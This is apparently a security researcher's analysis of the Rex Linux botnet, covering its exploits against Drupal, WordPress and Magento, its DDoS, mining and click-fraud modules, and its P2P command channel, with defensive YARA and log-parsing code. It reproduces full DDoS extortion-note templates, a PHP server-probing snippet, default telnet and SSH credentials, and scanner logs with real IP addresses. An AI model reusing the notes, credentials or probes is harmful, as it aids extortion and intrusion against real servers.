illustration by Craig Simmons

Octopus-Rex: evolution of a multi-task botnet

Introduction

During the last decade, different types of malware have been targeting Linux servers: Elknot, Encoder, Mirai, LuaBot, NyaDrop, Gayfgt, etc. Most of them are used for DDoS purposes, but there are some exceptions. Rex is one of them.
In this article we’ll try to present a detailed analysis of Rex.
Rex is a new malware family written in Go. Monitoring its activity over the last seven months has shown how much effort went into developing its various features.

Malware overview

Rex is a hybrid between a malware and a tool. Its behavior depends on a list of arguments.
You can use it in two different ways:
– Scan mode: with the “scan” command line argument, the binary uses embedded exploits to infect new Linux servers.
– Without scan mode: Rex contacts other bots through a P2P protocol (DHT over HTTPS) and waits for commands.
Rex is always installed as a hidden file in the directory /tmp/; the malware has no persistence mechanism or any other hiding feature. Quite the contrary: a help menu is available (-h).

benkow@stormshield:/home/rex/tmp$ ./.Z9g5aas0p0 -h
Usage of ./.Z9g5aas0p0:
  -debug
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
  -elevate.skip
        skip elevation (default true)
  -ipc
        enable stdio ipc
  -log.dht
        log DHT requests
  -log.http
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "0.0.0.0/0")
  -wait int
        wait for PID to exit before starting (0: disable)
  -wordpress.pingback
        enable WordPress Pingback

The help menu describes all the features available for both modes (scan or C&C).
Argument details:
– Debug/log: launch the malware in debug mode; this is useful for analysis.
– Elevate: Rex can try to run itself as root by brute-forcing the SSH service; specific credentials can be excluded with -elevate.ignore.
– Ipc: we have not seen this feature used yet.
– Socks: launch Rex through a SOCKS proxy.
– Strategy: configure how Rex scans IPs (random or sequential).
There are also some hidden arguments. You can use Rex as a DDoS tool with the argument “–stresser target”.
The main process is used for malware communication; when the bot master sends a command, the main process forks with the command as argument.
This is why, when you look at an infected host, Rex uses several processes:

Development cycle

Rex is a very active botnet. The binary is updated on a daily basis. We’ll try to give an overview of seven months of new features.

Once upon a time… Rex – April 2016

The first version (a808a6e45d4f3837fcf30a28f6594ffff320f9b994eb35f7e915dd9d954c912c) was spotted at the end of April 2016.
Thanks to the debug logs, we know that the malware is built in “/home/ubuntu/src/rex/”.

Exploits

The first version was mainly used to infect a first group of servers. It contained several exploits but no useful features.
Rex tries to infect other servers via web-based exploits (WordPress, Drupal…).
In order to exploit a remote file inclusion vulnerability, the remote file is hosted on infected machines on port 5099, e.g. https://%s:5099/payload/php/%s/wp-gwollegb/ for the gwollegb RFI exploit.

Drupal

Rex infects Drupal websites via CVE-2014-3704, a SQLi that allows an attacker to change the admin password. It serves two purposes: first, getting access to the server, and second, locking the website in order to ask for a ransom.
After exploitation, Rex posts a blog entry on the homepage with the following message:
“Website is locked. Please transfer 1.4 BitCoin to address 3M6SQh8Q6d2j1B4JRCe2ESRLHT4vTDbSM9 to unlock content.”
In the first version, the Drupal locker was the only “visible” feature.

WordPress

Rex embeds the following WordPress plugin exploits:
– Revslider
– Site-import
– Brandfolder
– Squirrel
– Robo-gallery
– Gwolle
– Woocommerce
– Issu panel

Hereafter is an example of infection:

In this example, Rex exploits the Revslider WordPress plugin in order to upload a zip file (Showbiz.zip / revslider.zip) which contains a PHP script used to check the PHP configuration (safe_mode, disable_functions, open_basedir):

<?php print(ini_get('safe_mode').'|'.ini_get('safe_mode_exec_dir').'|'.ini_get('disable_functions').'|'.ini_get('open_basedir'));;die('ok - h5tmVOxiMH');?>

If everything is OK, the Rex binary is uploaded and the server is infected.

Kerner

Rex embeds a module called “Kerner”, a reference to the blog “Kerner on security”. This module is a Remote Code Execution exploit for CCTV-DVR devices.

Jetspeed

Rex embeds 2 Jetspeed exploits (CVE-2016-0709, CVE-2016-0710). These exploits are flagged as “TODO” and are not functional yet.

“We are armada collective” – May 2016

After one month, the bot master uploaded the first big update with an interesting feature: a ransom note sent to the Drupal admin (21-05-2016, 92651d4a11a43a9043a8126f2ada1e5bf1e00cb506d46c939e20f3ece93cb81d).

We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

Interesting fact about this ransom note: CloudFlare reported detection of this threat in March 2016, but we spotted the first version of Rex carrying it only at the end of May 2016.
A deeper look at the ransom note shows that it is not exactly the same; we have the same bullshit about 1 Tbps DDoS attacks, but the sender email is different (we’ve seen armada-collective@gmail.com / armada-collective@hotmail.com, while CloudFlare saw armada.collective@openmailbox.org).
This coincidence lets us think that the Rex developers did some tests with this threat before creating Rex. At this time, no real DDoS feature was present in the binary.
Three days later (24-05-2016), another update came with one real DDoS implementation, DnsAmpl.

Optimizations time – June 2016.

During June 2016 we did not notice important updates, but we saw that the bot master refactored the source code until the end of June.
At the end of June, Rex implemented a complete “stresser” module. The malware now supports many different DDoS types (HTTP, SlowLoris, DNSAmp…) and the builder moved to another machine (“/home/user/src/rex/”).

“We are anonymous” – July 2016

Some days later (09-07-2016), Rex added 3 new exploits:
– Drupal RESTWS RCE exploit
– Magento RCE exploit (CVE-2015-1397)
– AirOS Arbitrary File Upload exploit
The ransom note was rewritten. They no longer mention Armada Collective but call themselves “Anonymous”.

FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!
We are Anonymous.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) 
if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
Right now we will start 15 minutes attack on your site's IP {{ .IP }}. It will not be hard, 
we will not crash it at the moment to try to minimize eventual damage, 
which we want to avoid at this moment. It's just to prove that this is not a hoax. Check your logs!
If you don't pay by {{ .Time.Weekday.String }}, 
attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, 
instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

The ransom note tries to be more credible: it asks the victim to check their logs, something it could not do before because of the lack of a DDoS feature. But it is not enough to earn money. We checked some bitcoin addresses and all these wallets were empty.

BTCBrute and Clicky – August 2016.

Early in August, two new important updates came. The malware size increased by 1.5 MB, and it now embeds a bitcoin miner based on btcsuite and a click fraud module called “clicky”.
The click fraud part is really interesting. Rex uses the botnet to display ads hosted on a-ads.com. The game here is to use each bot to click on ads and earn money from the advertiser. The good news is that it is easy to track a-ads ad campaigns and to retrieve nice statistics.
We spotted three ad units: 218355 (code name “Unicorns!”), 261029 (code name “Porkupines!”) and 251270 (code name “Ferries!”). Two of them are associated with the bitcoin address 1HebiSQX2WfE2kXUuva79US4zNUxcYrHjZ and the last one uses 1Q6mA6ERbwmaHX1nYwkrKuDiVjCYe2xma3.

unit 218355 – income details

unit 218355 – impressions details

The displayed ads look like this:

At the time we wrote this article, the clicky module had generated ~1€.

History of a fail – September 2016.

At the end of August, the first big fail of Rex started (91164673cda591a9a4dec91ecda6dbb515d48df7b56108b5fa0053395c733188). Rex implements a feature for creating a lot of Instagram accounts, probably for social network fraud. But bypassing Instagram’s anti-spam is not so easy 🙂
First, Rex tries to use the botnet to create Instagram accounts via https://www.instagram.com/accounts/web_create_ajax/
Each bot used its own IP to create these fake accounts. But Instagram has some anti-spam features, and all nodes of the botnet were blacklisted in a few minutes.

{ID: Email:oTmJzK6p@gmail.com Name:oTmJzK6p Username:oTmJzK6p Password:DU9vD} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): token
{ID: Email:oTmJzK6p@gmail.com Name:Sin4a Username:Sin4a Password:eVdU6} 
(via &{Addr:XXX.XXX.XX.XXX:443 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

One week later, because of the node blacklist, the bot master implemented a SOCKS proxy feature in order to bypass the Instagram blacklist.
This new feature again resulted in 2 fails:
– The first implementation failed because of the length of the password.

{"status": "ok", "errors": {"password": ["Create a password at least 6 characters long."]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Email:ZRSlnk3uH@gmail.com Name:ZRSlnk3uH Username:ZRSlnk3uH Password:A1EtB} 
(via &{Addr:X.XXX.XXX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): not created

– The second fail resides in the fact that Rex uses a known SOCKS proxy list that is already blocked by Instagram.

{"status": "ok", "errors": 
{"ip": ["The IP address you are using has been flagged as an open proxy. 
If you believe this to be incorrect, please visit http://help.instagram.com/"]}, 
"account_created": false}instagram.AccountCreate 
&{ID: Email:LOT8mWL@gmail.com Name:LOT8mWL Username:LOT8mWL Password:yF7QO3} 
(via &{Addr:XXX.XX.XX.XX:80 Type:2 Node:<nil> 
Created:0001-01-01 00:00:00 +0000 UTC Updated:0001-01-01 00:00:00 +0000 UTC}): ip blacklisted

After one month of fails, we have not seen this feature used by the bot master anymore.

When Rex meets Mirai – October 2016

After seven months of life, the main problem with Rex is the low number of bots. Without a large botnet, it is difficult to get a real return on investment.
In September 2016 (4b513dfc68fe825e5f83c51fc1a023c15bf1039e48e025a0a4f4b034dbf443b9), the media put the spotlight on the Mirai botnet (an IoT botnet used for DDoS).
After the leak of the Mirai source code, the Rex developer tried to implement the Mirai telnet scanner in Rex.

*scanner.telnet.mirai 81.196.136.114:23 - trying ubnt:ubnt
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 36 in "ubnt\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - trying 888888:888888
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "888888\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "enable\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 38 in "system\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 37 in "shell\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 34 in "sh\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 81.196.136.114:23 - trying root:xc3511
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*scanner.telnet.mirai 81.196.136.114:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "

As usual, this first buggy version of the Rex telnet scanner was tested directly in the wild. Unfortunately for the bot master, after one week of telnet scanning, only a few new victims were infected (less than 10). But now, when you retrieve a Mirai sample via honeypots, you have to make sure that it is not Rex ;).
At the end of October (25-10-2016) (1058cce9f28c2a3522c31b67e913f00f229c2e00977c979dd68237e184c6df79), an update included an SSH scanner. The malware scans the Internet for SSH and tries to brute force the services with the same password list as Mirai.

*ssh.Scanner.Scan 81.169.176.212:22 - ssh
*ssh.Scanner.Scan 103.214.68.47:22 - ssh
*ssh.Scanner.Scan 77.93.214.53:22 - ssh
*ssh.Scanner.Scan 52.19.30.202:22 - ssh
*ssh.Scanner.Scan 177.101.179.169:22 - ssh
*ssh.Scanner.Scan 23.244.38.136:22 - ssh
*ssh.Scanner.Scan 117.253.221.213:22 - ssh
*ssh.Scanner.Scan 194.97.64.9:22 - ssh
*ssh.Scanner.Scan 52.6.180.43:22 - ssh
*ssh.Scanner.login 117.253.221.213:22 root anko - version "SSH-2.0-dropbear_0.52"
*ssh.Scanner.Scan 174.142.159.136:22 - ssh
*ssh.Scanner.Scan 68.179.101.245:22 - ssh
*ssh.Scanner.login 117.253.221.213:22 [root anko]: wait: remote command exited without exit status or exit signal
*ssh.Scanner.Scan 175.25.48.200:22 - ssh
*ssh.Scanner.Scan 195.154.168.111:22 - ssh
*ssh.Scanner.Scan 93.63.138.187:2222 - ssh
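A recovered Rex debug log like the excerpts above is mostly useful to a responder as a list of the hosts the bot probed and the credentials it tried against them. The parser below is an added example, not code from the analysis or from Rex: the line shapes for both the telnet and the SSH scanner are inferred from the excerpts above, and the embedded sample log is constructed in those shapes with TEST-NET addresses.

```python
"""Parse Rex scanner debug-log lines and summarise activity per probed host.
Added example: the line formats are inferred from the telnet/SSH excerpts of
the analysis; the sample below is constructed (TEST-NET addresses)."""
import re
import sys
from collections import OrderedDict

# Every scanner line reads "*<module> <ip>:<port> <rest>"
LINE_RE = re.compile(
    r'^\*(?P<module>[\w.]+) (?P<host>\d{1,3}(?:\.\d{1,3}){3}:\d+) (?P<rest>.*)$')

# What follows the host, tried in order; named groups are copied into the event.
REST_PATTERNS = [
    ('credential', re.compile(r'^- trying (?P<user>[^:]*):(?P<password>.*)$')),
    ('prompt',     re.compile(r'^- prompt at (?P<offset>\d+) in "')),
    ('rejected',   re.compile(r'^- credentials incorrect ')),
    ('service',    re.compile(r'^- ssh$')),
    # the SSH login line carries the server's version banner
    ('credential', re.compile(r'^(?P<user>\S+) (?P<password>\S+) - version "(?P<banner>[^"]*)"$')),
    # outcome of the command the scanner ran after logging in
    ('command',    re.compile(r'^\[(?P<user>\S+) (?P<password>\S+)\]: (?P<status>.*)$')),
]

# Constructed sample in the shape of the excerpts above (not real targets).
SAMPLE_LOG = r"""*scanner.telnet.mirai 192.0.2.10:23 - trying ubnt:ubnt
*scanner.telnet.mirai 192.0.2.10:23 - prompt at 36 in "ubnt\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 192.0.2.10:23 - credentials incorrect "/bin/busybox MIRAI\r\nUser name is incorrect\r\n\rLogin: "
*scanner.telnet.mirai 192.0.2.10:23 - trying root:xc3511
*scanner.telnet.mirai 192.0.2.10:23 - prompt at 35 in "\r\n\rPassword is incorrect\r\n\rPassword: "
*ssh.Scanner.Scan 198.51.100.7:22 - ssh
*ssh.Scanner.Scan 198.51.100.9:2222 - ssh
*ssh.Scanner.login 198.51.100.7:22 root anko - version "SSH-2.0-dropbear_0.52"
*ssh.Scanner.login 198.51.100.7:22 [root anko]: wait: remote command exited without exit status or exit signal
serving 0.0.0.0:5099
"""


def parse_line(line):
    """Return an event dict for a scanner line, or None for anything else."""
    m = LINE_RE.match(line.rstrip('\r\n'))
    if not m:
        return None
    event = {'module': m['module'], 'host': m['host'], 'kind': 'unknown'}
    for kind, rx in REST_PATTERNS:
        r = rx.match(m['rest'])
        if r:
            event['kind'] = kind
            event.update(r.groupdict())
            break
    return event


def summarize(log_text):
    """Group events per host: modules seen, distinct credentials tried,
    SSH banner, prompt/rejection counts and the last post-login status."""
    hosts = OrderedDict()
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        h = hosts.setdefault(ev['host'], {
            'modules': set(), 'credentials': [], 'banner': None,
            'prompts': 0, 'rejected': 0, 'command_status': None})
        h['modules'].add(ev['module'])
        if ev['kind'] == 'credential':
            pair = (ev['user'], ev['password'])
            if pair not in h['credentials']:
                h['credentials'].append(pair)
            if ev.get('banner'):
                h['banner'] = ev['banner']
        elif ev['kind'] == 'prompt':
            h['prompts'] += 1
        elif ev['kind'] == 'rejected':
            h['rejected'] += 1
        elif ev['kind'] == 'command':
            h['command_status'] = ev['status']
    return hosts


def report(hosts):
    """One line per probed host, suitable for a victim-notification list."""
    lines = []
    for host, h in hosts.items():
        creds = ', '.join(f'{u}:{p}' for u, p in h['credentials']) or '-'
        lines.append(f"{host} via {'/'.join(sorted(h['modules']))}: "
                     f"creds [{creds}] banner={h['banner']} "
                     f"prompts={h['prompts']} rejected={h['rejected']}")
    return lines


if __name__ == '__main__':
    # Usage: python rex_log.py /path/to/recovered/log   (sample log if omitted)
    text = open(sys.argv[1], errors='replace').read() if len(sys.argv) > 1 else SAMPLE_LOG
    print('\n'.join(report(summarize(text))))
```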

Last funny fact: this version includes a set of flags used for QA and benchmarking purposes (the -test.* flags registered by Go’s testing package, which means that package was linked into the binary). Maybe they hired a Quality Engineer.

benkow_@stormshield:/home/rex# ./rex -h
Usage of ./rex:
  -debug
        enable debugging
  -elevate.ignore string
        credentials to ignore during elevation (default "root")
  -elevate.skip
        skip elevation (default true)
  -ipc
        enable stdio ipc
  -log.dht
        log DHT requests
  -log.http
        log HTTP requests
  -socks string
        SOCKS5 proxy address
  -strategy string
        scan strategy [random, sequential] (default "random")
  -target string
        target(s) (default "0.0.0.0/0")
  -test.bench string
        regular expression per path component to select benchmarks to run
  -test.benchmem
        print memory allocations for benchmarks
  -test.benchtime duration
        approximate run time for each benchmark (default 1s)
  -test.blockprofile string
        write a goroutine blocking profile to the named file after execution
  -test.blockprofilerate int
        if >= 0, calls runtime.SetBlockProfileRate() (default 1)
  -test.count n
        run tests and benchmarks n times (default 1)
  -test.coverprofile string
        write a coverage profile to the named file after execution
  -test.cpu string
        comma-separated list of number of CPUs to use for each test
  -test.cpuprofile string
        write a cpu profile to the named file during execution
  -test.memprofile string
        write a memory profile to the named file after execution
  -test.memprofilerate int
        if >=0, sets runtime.MemProfileRate
  -test.outputdir string
        directory in which to write profiles
  -test.parallel int
        maximum test parallelism (default 8)
  -test.run string
        regular expression to select tests and examples to run
  -test.short
        run smaller test suite to save time
  -test.timeout duration
        if positive, sets an aggregate time limit for all tests
  -test.trace string
        write an execution trace to the named file after execution
  -test.v
        verbose: print additional output
  -wait int
        wait for PID to exit before starting (0: disable)
  -wordpress.pingback
        enable WordPress Pingback

We’ll continue to monitor all these features; the developer seems to be creative.

Crawling the botnet

As a reminder, Rex uses DHT P2P over HTTPS for communication. Due to a certificate pinning failure, it is easy for us to man-in-the-middle the malware and then implement a crawler.
This is what a Rex DHT request looks like:

As you can see, Rex uses the default Go User-Agent “Go-http-client/1.1” and sends gzip-encoded requests.
We know that the DHT supports the following commands:
DHT.Store
DHT.Ping
DHT.FindValue
DHT.FindNode
DHT.Neighbors
So, it is easy to implement a quick crawler.
At the time of writing, despite the efforts of the bot master, the botnet is still harmless (~150 bots). Not enough to perform any significant DDoS.

We tried to identify the most affected country, but the random scan strategy does not allow us to conclude anything useful.

Conclusion

Linux malware is a trendy topic; we find new families every week. The huge number of vulnerable servers available and the absence of anti-virus attract crooks to the Linux side. They can stay on a compromised server for several months without being detected. In the case of Rex, if they had not implemented “visible” features like the Drupal locker, the malware would still be hidden.
Regarding how the bot master uses this botnet, we can easily conclude that it is probably not part of a big cyber gang; the Rex botnet looks more like an experimental botnet.
2017 promises us some funny crapware on Linux.

Annexes

Quick and dirty YARA rule for VTI

rule Rex {
  meta:
    description = "Quick and dirty rule for Rex malware"
    author = "Benkow_@Stormshield"
  strings:
    $string1 = {6d 61 69 6e 2e 67 6f}   // "main.go"
    $string2 = {72 65 78}               // "rex"
    $string3 = {64 72 75 70 61 6c}      // "drupal"
  condition:
    all of them
}

List of hashes (unpacked version only)



From website-locker to DDoS: Rex!

In May 2016, Softpedia wrote an article about a Drupal web ransomware. This malware exploits a SQL injection in the Drupal CMS, changes the admin credentials and asks for bitcoins to unlock the content.
After locking the website, a malware is executed on the server:

After this ends, the last uploaded file is a binary file written in the Go programming language, which is the actual ransomware. This Go binary deletes the file upload form and replaces it with the ransom note seen above.

Three months after this article, there was still no sample of this malware available on public repositories. So, it was time to try to find one. We only knew that the malware is developed in Go and exploits Drupal vulnerabilities. Thanks to @DlBlind, we also knew that it uses P2P to communicate.
Please note that this article is not a reverse of the malware but tries to explain the attack vector and some interesting key features.

Sample Hunting

Googling « Website is locked. Please transfer 1.4 BitCoin to address », we can find a lot of hacked Drupal sites. After a quick look, we retrieved an unknown sample executed as:

./G2eCM9jUiz -elevate.skip -wait 20619 2>/tmp/l

where the file “l” is actually a log file that looks like:

*node.Node.Run "random" 8184 0.0.0.0/0
*node.Node.runScanner *node.BlacklistFilter 0x18d7e4c0 7366
*rpc.Client.SetBinary "linux-386" 0x18c0b560
serving 0.0.0.0:5099

*rpc.Service.SetBinary &{Platform:linux-386 Binary:0x1901ae40}
new neighbor 192.167.9.33:5099
new neighbor 85.158.48.35:5099
new neighbor 89.111.52.140:5099
new neighbor 193.9.245.64:5099
new neighbor 121.42.178.179:5099
new neighbor 91.121.144.123:5099
[...]

The above snippet shows that the sample uses P2P communication.
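For a responder who finds a process launched like the one above, the two useful artefacts are its command line (from /proc/<pid>/cmdline) and the log it writes. The helper below is an added example, not code from the analysis: it matches a command line against the flags listed in Rex’s own help output (the “suspicious” heuristic is ours) and extracts the listening socket, scan settings and P2P neighbours from a log in the shape shown above, using constructed sample values (TEST-NET addresses).

```python
"""Triage helpers for a host suspected of running Rex: classify a process
command line against the launch pattern seen above and pull the listening
socket, scan settings and P2P neighbours out of the bot's log.
Added example, not code from the analysis: flag names come from Rex's own
help output, the "suspicious" heuristic is ours, samples are constructed."""
import glob
import os
import re

# Flags listed in Rex's -h output; DISTINCTIVE ones are unlikely on a
# legitimate daemon's command line.
REX_FLAGS = {'-debug', '-elevate.ignore', '-elevate.skip', '-ipc', '-log.dht',
             '-log.http', '-socks', '-strategy', '-target', '-wait',
             '-wordpress.pingback'}
DISTINCTIVE = {'-elevate.ignore', '-elevate.skip', '-log.dht', '-wordpress.pingback'}

# /proc/<pid>/cmdline is NUL-separated; the "2>/tmp/l" redirection of the
# observed launch line is done by the shell and never reaches argv.
SAMPLE_CMDLINE = './G2eCM9jUiz\x00-elevate.skip\x00-wait\x0020619\x00'

# Constructed log in the shape of the excerpt above (TEST-NET peers).
SAMPLE_LOG = """*node.Node.Run "random" 8184 0.0.0.0/0
serving 0.0.0.0:5099

*rpc.Service.SetBinary &{Platform:linux-386 Binary:0x1901ae40}
new neighbor 192.0.2.33:5099
new neighbor 198.51.100.35:5099
new neighbor 192.0.2.33:5099
"""

RUN_RE = re.compile(r'^\*node\.Node\.Run "(?P<strategy>\w+)" \d+ (?P<target>\S+)$')
SERVING_RE = re.compile(r'^serving (?P<addr>\S+)$')
NEIGHBOR_RE = re.compile(r'^new neighbor (?P<addr>\d{1,3}(?:\.\d{1,3}){3}:\d+)$')
PLATFORM_RE = re.compile(r'Platform:(?P<platform>[^ }]+)')


def split_cmdline(raw):
    """argv list from the raw content of /proc/<pid>/cmdline."""
    return [a for a in raw.split('\x00') if a]


def classify_cmdline(argv):
    """Match argv against Rex's flags. Go's flag package accepts both
    "-wait 123" and "-wait=123", so both spellings are handled."""
    found, wait_pid, i = [], None, 1
    while i < len(argv):
        name, _, inline_val = argv[i].partition('=')
        if name.startswith('-'):
            name = '-' + name.lstrip('-')          # "--wait" -> "-wait"
        if name in REX_FLAGS:
            found.append(name)
            if name == '-wait':                    # PID the bot waits on before starting
                val = inline_val or (argv[i + 1] if i + 1 < len(argv) else '')
                wait_pid = int(val) if val.isdigit() else None
                if not inline_val:
                    i += 1                         # skip the separate value
        i += 1
    exe = argv[0] if argv else ''
    return {
        'exe': exe,
        'hidden_or_tmp': os.path.basename(exe).startswith('.') or exe.startswith('/tmp/'),
        'rex_flags': found,
        'wait_pid': wait_pid,
        'suspicious': bool(DISTINCTIVE & set(found)) or len(found) >= 2,
    }


def parse_log(log_text):
    """Scan strategy/target, listening socket, platform and distinct P2P
    neighbours (first-seen order) from a Rex log."""
    info = {'strategy': None, 'target': None, 'listen': None,
            'platform': None, 'neighbors': []}
    for line in log_text.splitlines():
        line = line.strip()
        m = RUN_RE.match(line)
        if m:
            info['strategy'], info['target'] = m['strategy'], m['target']
            continue
        m = SERVING_RE.match(line)
        if m:
            info['listen'] = m['addr']
            continue
        m = NEIGHBOR_RE.match(line)
        if m:
            if m['addr'] not in info['neighbors']:
                info['neighbors'].append(m['addr'])
            continue
        m = PLATFORM_RE.search(line)
        if m and info['platform'] is None:
            info['platform'] = m['platform']
    return info


def scan_proc():
    """Live check on Linux: yield (pid, verdict) for Rex-looking processes."""
    for path in glob.glob('/proc/[0-9]*/cmdline'):
        try:
            with open(path, 'rb') as f:
                verdict = classify_cmdline(split_cmdline(f.read().decode('utf-8', 'replace')))
        except OSError:
            continue
        if verdict['suspicious']:
            yield int(path.split('/')[2]), verdict
```

The neighbour list is what you would feed to egress filtering or a notification list, and the `-wait` PID points at the process the bot waited for before starting, which is worth recovering from the same host if it is still running.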

A quick analysis of the sample shows that it is developed in Go and compressed with UPX. At the time of analysis, it was not detected by any anti-virus on VT.
We found our sample, and it’s an interesting one. Actually, Drupal locking is a very small part of the available features of the self-named “Rex” malware, which is still evolving. We found many different variants from April to August 2016.

Rex malware weapons

Rex is made of 5 different parts. Some of them seem to still be in development:

  • Attack vector
  • Bitcoin mining
  • C&C Communication
  • Ransom – Armada Collective
  • DDoS

Hereafter, we will look into the details of each of these parts.

Attack vector

Depending on the variant, Rex scans the Internet for different vulnerable services. The kill chain is simple:

  • Bots are scanning Internet for vulnerable websites
  • Websites are infected and defaced (Drupal-locker)
  • “Rex” malware is dropped on the server
  • The server communicates with other bots via P2P.

Hereafter, a non-exhaustive list of exploits used by different variants of Rex.

Drupal

It’s nothing new: Rex can exploit a SQL injection on Drupal 7 via CVE-2014-3704. The malware adds a new admin account, locks all blog posts with website-locker notes, then uploads and executes Rex.

WordPress

Rex is able to infect other CMSs; WordPress plugins are mainly targeted. At least 8 exploits are available:

We have found some infected WordPress websites but we didn’t see any of them locked.

Magento

The botnet scans for Magento eCommerce too. It looks for the ShopLift RCE (https://www.exploit-db.com/exploits/37977/). The attack is similar to the Drupal one: a new admin account is created and a webshell is used to execute Rex.

Misc

A few other exploits are shipped with Rex:

The above list confirms that Rex does not focus on website locking but tries to build a P2P botnet.

Bitcoin mining

Like lots of malware, Rex has bitcoin mining capabilities. We won’t dig into the details of this.

C&C communication

We haven’t looked deeper into the network part, but thanks to @silascutler and @DlBlind we know that this botnet uses a Kademlia P2P network (“/home/user/src/rex/dht/”, https://github.com/nictuku/dht) on port 5099 with TLS enabled.

It seems that all the aforementioned weapons are available through the P2P network.

Ransom – Armada Collective

The most curious feature of the malware is called RansomScanner. It is used to retrieve the admin contacts of the infected website and send them a DDoS threat email. Below, the email template:

Armada Collective <armada.collective@gmail.com>
FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!
We are Armada Collective.
All your servers will be DDoS-ed starting {{ .Time.Weekday.String }} ({{ .Time.Format "Jan 2 2006" }}) if you don't pay {{ .Amount }} Bitcoins @ {{ .Address }}
When we say all, we mean all - users will not be able to access sites host with you at all.
If you don't pay by {{ .Time.Weekday.String }}, attack will start, price to stop will increase by {{ .Step }} BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - sometimes over 1 Tbps per second. So, no cheap protection will help.
Prevent it all with just {{ .Amount }} BTC @ {{ .Address }}
Do not reply, we will probably not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

It’s a well-known template used by the crooks of Armada Collective. Lots of people have received this kind of email. Cloudflare wrote a blog post about this ransom note.
There is a supposed gang that sends extortion emails to online businesses, but nobody has seen any real DDoS. Unfortunately, this kind of scam seems to work.

In spite of the lack of actual DDoS follow through, it appears that many victims are paying the extortion fee. A security analyst from the Bitcoin analysis firm Chainalysis studied payments sent to the Armada Collective’s Bitcoin addresses and concluded that more than USD$100,000 has been sent to the attackers by victims.

An example of a StackExchange post:
But things are starting to change…

DDoS

Armada Collective emails look like a hoax, BUT we have seen infected servers actually running real DDoS attacks!

Armada Collective seems to be starting a new strategy and trying to launch real attacks. The “1Tbps” threat seems ridiculous, but if the botnet grows by leveraging fresh vulnerabilities, it may become more harmful.

In the recent versions of Rex, the ransom note has been updated:

FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!
We are Anonymous.
